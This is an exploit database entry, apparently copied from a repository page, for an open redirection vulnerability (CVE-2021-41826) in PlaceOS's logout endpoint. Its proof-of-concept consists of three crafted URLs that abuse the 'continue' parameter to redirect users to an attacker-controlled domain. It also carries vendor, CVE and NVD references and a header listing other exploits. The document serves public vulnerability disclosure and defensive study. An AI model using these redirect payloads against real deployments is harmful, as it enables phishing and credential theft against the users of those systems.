f32872547a
5 changes to exploits/shellcodes Wordpress Plugin JS Jobs Manager 1.1.7 - Unauthenticated Plugin Install/Activation Cyber Cafe Management System Project (CCMS) 1.0 - SQL Injection Authentication Bypass Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated) Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi) PlaceOS 1.2109.1 - Open Redirection
18 lines
No EOL
735 B
Text
18 lines
No EOL
735 B
Text
# Exploit Title: PlaceOS 1.2109.1 - Open Redirection
|
|
# Date: 29-09-2021
|
|
# Exploit Author: Hamza Khedr @ Accenture Austalia AARO Team
|
|
# Vendor Homepage: https://place.technology/
|
|
# Software Link: https://github.com/PlaceOS
|
|
# Version: < 1.29.10
|
|
# Tested on: Ubuntu 20.04
|
|
# CVE: CVE-2021-41826
|
|
#
|
|
#
|
|
# PoC: "https://office.example.com/auth/logout?continue=//attacker.com"
|
|
# "https://office.example.com/auth/logout?continue=.attacker.com"
|
|
# "https://office.example.com/auth/logout?continue=:password@attacker.com"
|
|
#
|
|
#
|
|
# Reference: https://github.com/PlaceOS/auth/issues/36
|
|
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41826
|
|
# https://nvd.nist.gov/vuln/detail/CVE-2021-41826 |